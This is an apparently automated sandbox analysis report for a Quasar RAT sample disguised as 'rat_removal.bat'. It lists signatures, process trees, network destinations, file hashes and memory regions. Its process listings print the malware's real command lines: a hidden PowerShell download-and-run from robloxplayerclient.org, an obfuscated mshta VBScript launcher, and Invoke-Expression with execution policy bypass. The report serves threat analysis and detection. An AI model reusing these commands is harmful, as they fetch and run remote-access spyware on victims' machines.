Malware Analysis Report

2025-06-16 05:31

Sample ID 240314-f3wxmsdg73
Target rat_removal.bat
SHA256 7e81cadeef133c8230dbe26f95a66d3b47cead73ba1e37170ac95869abe17f8e
Tags quasar spyware trojan
Score 10/10

Analysis Overview

Score 10/10

SHA256 7e81cadeef133c8230dbe26f95a66d3b47cead73ba1e37170ac95869abe17f8e

Threat Level: Known bad

The file rat_removal.bat was found to be: Known bad.

Malicious Activity Summary

quasar spyware trojan

Quasar RAT

Quasar payload

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Drops file in Windows directory

Enumerates physical storage devices

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Analysis: static1

Detonation Overview

Reported 2024-03-14 05:24

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted 2024-03-14 05:24
Reported 2024-03-14 05:27
Platform win10v2004-20240226-en
Max time kernel 49s
Max time network 37s

Command Line

C:\Windows\system32\lsass.exe

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Windows\$sxr-mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\$sxr-mshta.exe N/A
N/A N/A C:\Windows\$sxr-cmd.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\$sxr-mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\$sxr-cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\$sxr-powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\$sxr-mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\$sxr-mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4104 wrote to memory of 5052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 4104 wrote to memory of 5052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 4104 wrote to memory of 3196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4104 wrote to memory of 3196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4104 wrote to memory of 4908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4104 wrote to memory of 4908 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4104 wrote to memory of 2092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4104 wrote to memory of 2092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4104 wrote to memory of 3360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4104 wrote to memory of 3360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4104 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4104 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 4104 wrote to memory of 2060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4104 wrote to memory of 2060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4104 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4104 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4104 wrote to memory of 1800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4104 wrote to memory of 1800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4104 wrote to memory of 1812 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4104 wrote to memory of 1812 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4104 wrote to memory of 1280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4104 wrote to memory of 1280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1280 wrote to memory of 2660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1280 wrote to memory of 2660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1280 wrote to memory of 4504 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1280 wrote to memory of 4504 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3484 wrote to memory of 436 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 3484 wrote to memory of 436 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 436 wrote to memory of 3516 N/A C:\Windows\$sxr-cmd.exe C:\Windows\system32\cmd.exe
PID 436 wrote to memory of 3516 N/A C:\Windows\$sxr-cmd.exe C:\Windows\system32\cmd.exe
PID 436 wrote to memory of 1432 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 436 wrote to memory of 1432 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 1432 wrote to memory of 680 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\lsass.exe
PID 1432 wrote to memory of 680 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\lsass.exe
PID 1432 wrote to memory of 968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 968 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 432 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 432 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 528 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\svchost.exe
PID 1432 wrote to memory of 528 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\svchost.exe
PID 1432 wrote to memory of 1084 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\svchost.exe
PID 1432 wrote to memory of 1084 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\svchost.exe
PID 1432 wrote to memory of 1092 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1092 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1100 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1100 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1208 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1208 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1272 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\svchost.exe
PID 1432 wrote to memory of 1272 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\svchost.exe
PID 1432 wrote to memory of 1328 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1328 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1356 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1356 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1396 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1396 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1504 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1504 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1596 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\svchost.exe
PID 1432 wrote to memory of 1596 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\svchost.exe
PID 1432 wrote to memory of 1604 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1604 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe
PID 1432 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat_removal.bat"

C:\Windows\system32\chcp.com

chcp.com 437

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c type tmp

C:\Windows\system32\findstr.exe

findstr /L /I set C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\findstr.exe

findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\findstr.exe

findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\findstr.exe

findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\rat_removal.bat

C:\Windows\system32\find.exe

find

C:\Windows\system32\find.exe

find

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c type tmp

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://robloxplayerclient.org/Uni.bat' -OutFile: 'C:\Users\Admin\AppData\Local\Temp\Uni.bat'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Uni.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:OWMmhUSKSJ; "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jKiXOIbCnNURqPPCCxgw4312:TlctmzlD=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-jKiXOIbCnNURqPPCCxgw4312:TlctmzlD=%

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:YukCfVmozO; "

C:\Windows\$sxr-powershell.exe

C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass

Network

Country Destination Domain Proto
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 robloxplayerclient.org udp
US 104.21.7.174:443 robloxplayerclient.org tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 174.7.21.104.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\tmp

MD5 ce585c6ba32ac17652d2345118536f9c
SHA1 be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256 589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512 d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

memory/1812-5-0x0000021592E60000-0x0000021592E82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_adp4imuo.w3c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1812-14-0x00007FFCC7DE0000-0x00007FFCC88A1000-memory.dmp

memory/1812-15-0x00000215AB2D0000-0x00000215AB2E0000-memory.dmp

memory/1812-16-0x00000215AB2D0000-0x00000215AB2E0000-memory.dmp

memory/1812-20-0x00007FFCC7DE0000-0x00007FFCC88A1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Uni.bat

MD5 7a98c3b9846bfac750cb9ecb4c92e06e
SHA1 547f1300c41c50658c7ef4530de478992d6b4f5e
SHA256 63422f3ad2d7ede071a78fe768d32af2143d384ad469be3ce4495450e99518c3
SHA512 61394ba7135a42c8a7c224cc09811a6e29ec9e84ceaeaea6352021ccea251e93f96983b44cd8072d36915d3b2c52316804dd2e609afa108619fdf2139bd2e0ac

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/4504-23-0x00007FFCC7DE0000-0x00007FFCC88A1000-memory.dmp

memory/4504-24-0x00000166C6C90000-0x00000166C6CA0000-memory.dmp

memory/4504-25-0x00000166C6C90000-0x00000166C6CA0000-memory.dmp

memory/4504-35-0x00000166C71F0000-0x00000166C7234000-memory.dmp

memory/4504-36-0x00000166C7240000-0x00000166C72B6000-memory.dmp

memory/4504-37-0x0000016690000000-0x0000016690AAC000-memory.dmp

memory/4504-38-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/4504-39-0x0000016690AB0000-0x000001669159C000-memory.dmp

memory/4504-40-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/4504-41-0x00007FFCE3FD0000-0x00007FFCE408E000-memory.dmp

memory/4504-42-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/4504-43-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/4504-44-0x00000166FFBB0000-0x00000166FFCAC000-memory.dmp

memory/4504-45-0x00000166C6E10000-0x00000166C6E32000-memory.dmp

memory/4504-46-0x00000166C6E30000-0x00000166C6E36000-memory.dmp

memory/4504-47-0x00000166C6E40000-0x00000166C6E9E000-memory.dmp

memory/4504-48-0x00000166DF490000-0x00000166DF4E8000-memory.dmp

memory/4504-49-0x00000166AE8C0000-0x00000166AE8C6000-memory.dmp

memory/4504-50-0x00000166CF380000-0x00000166CF388000-memory.dmp

memory/4504-51-0x00000166915A0000-0x00000166915A6000-memory.dmp

memory/4504-52-0x00000166915B0000-0x00000166915EE000-memory.dmp

memory/4504-53-0x0000016691640000-0x000001669226C000-memory.dmp

memory/4504-54-0x0000016692270000-0x0000016692322000-memory.dmp

memory/4504-55-0x0000016692320000-0x0000016692356000-memory.dmp

memory/4504-56-0x0000016692360000-0x00000166923B8000-memory.dmp

memory/4504-57-0x00000166923C0000-0x00000166923EE000-memory.dmp

memory/4504-58-0x00007FF74DA30000-0x00007FF74DAA1000-memory.dmp

memory/4504-59-0x00007FFCC7DE0000-0x00007FFCC88A1000-memory.dmp

memory/4504-61-0x00000166915F0000-0x00000166915F8000-memory.dmp

memory/4504-62-0x0000000180000000-0x0000000180007000-memory.dmp

memory/4504-65-0x00000166C6C90000-0x00000166C6CA0000-memory.dmp

memory/4504-66-0x00000166C6C90000-0x00000166C6CA0000-memory.dmp

memory/4504-71-0x00007FFCC7558000-0x00007FFCC7559000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 0b4340ed812dc82ce636c00fa5c9bef2
SHA1 51c97ebe601ef079b16bcd87af827b0be5283d96
SHA256 dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512 d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

C:\Windows\$sxr-cmd.exe

MD5 8a2122e8162dbef04694b9c3e0b6cdee
SHA1 f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256 b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA512 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

C:\Windows\$sxr-powershell.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/1432-81-0x00007FFCC7DE0000-0x00007FFCC88A1000-memory.dmp

memory/1432-83-0x0000027768F30000-0x0000027768F40000-memory.dmp

memory/1432-82-0x0000027768F30000-0x0000027768F40000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2b24af1492f112d2e53cb7415fda39f
SHA1 dbfcee57242a14b60997bd03379cc60198976d85
SHA256 fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA512 9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 a26df49623eff12a70a93f649776dab7
SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

memory/4504-96-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/1432-97-0x00000277797E0000-0x0000027779E86000-memory.dmp

memory/4504-98-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/1432-99-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/1432-100-0x0000027779E90000-0x000002777A578000-memory.dmp

memory/1432-101-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/1432-102-0x00007FFCE3FD0000-0x00007FFCE408E000-memory.dmp

memory/1432-103-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/1432-104-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/1432-105-0x0000027750BE0000-0x0000027750C02000-memory.dmp

memory/1432-106-0x0000027750CD0000-0x0000027750CD6000-memory.dmp

memory/1432-107-0x0000027750D20000-0x0000027750D26000-memory.dmp

memory/1432-108-0x000002777A980000-0x000002777AECE000-memory.dmp

memory/1432-109-0x000002777AED0000-0x000002777B67E000-memory.dmp

memory/1432-110-0x000002777B680000-0x000002777BA0C000-memory.dmp

memory/1432-111-0x000002777BA10000-0x000002777BAC2000-memory.dmp

memory/4504-113-0x00007FFCC7DE0000-0x00007FFCC88A1000-memory.dmp

memory/4504-114-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/1432-115-0x000002777BB00000-0x000002777BB6A000-memory.dmp

memory/1432-116-0x000002777BB70000-0x000002777BBB2000-memory.dmp

memory/1432-117-0x0000027768F30000-0x0000027768F40000-memory.dmp

memory/1432-121-0x0000000180000000-0x0000000180007000-memory.dmp

memory/680-124-0x000001C0EA3B0000-0x000001C0EA3D3000-memory.dmp

memory/680-125-0x000001C0EA800000-0x000001C0EA829000-memory.dmp

memory/680-126-0x000001C0EA800000-0x000001C0EA829000-memory.dmp

memory/680-134-0x00007FFCA5F30000-0x00007FFCA5F40000-memory.dmp

memory/680-136-0x000001C0EA800000-0x000001C0EA829000-memory.dmp

memory/680-135-0x000001C0EA800000-0x000001C0EA829000-memory.dmp

memory/680-139-0x00007FFCE5F4D000-0x00007FFCE5F4E000-memory.dmp

memory/968-141-0x000001C66D7D0000-0x000001C66D7F9000-memory.dmp

memory/1432-149-0x00007FFCC7DE0000-0x00007FFCC88A1000-memory.dmp

memory/968-151-0x00007FFCA5F30000-0x00007FFCA5F40000-memory.dmp

memory/1432-153-0x0000027768F30000-0x0000027768F40000-memory.dmp

memory/968-152-0x000001C66D7D0000-0x000001C66D7F9000-memory.dmp

memory/968-155-0x00007FFCE5F4C000-0x00007FFCE5F4D000-memory.dmp

memory/968-154-0x000001C66D7D0000-0x000001C66D7F9000-memory.dmp

memory/432-159-0x000001A828260000-0x000001A828289000-memory.dmp

memory/1432-160-0x0000027768F30000-0x0000027768F40000-memory.dmp

memory/432-169-0x000001A828260000-0x000001A828289000-memory.dmp

memory/432-168-0x00007FFCA5F30000-0x00007FFCA5F40000-memory.dmp

memory/432-170-0x000001A828260000-0x000001A828289000-memory.dmp

memory/528-174-0x00000220445D0000-0x00000220445F9000-memory.dmp

memory/1432-179-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

memory/1432-185-0x00007FFCE5EB0000-0x00007FFCE60A5000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted 2024-03-14 05:24
Reported 2024-03-14 05:27
Platform win11-20240214-en
Max time kernel 43s
Max time network 23s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat_removal.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\$sxr-mshta.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\$sxr-powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\$sxr-mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\$sxr-cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\$sxr-cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3252 wrote to memory of 4420 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3252 wrote to memory of 4420 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3252 wrote to memory of 4160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 4160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 4472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
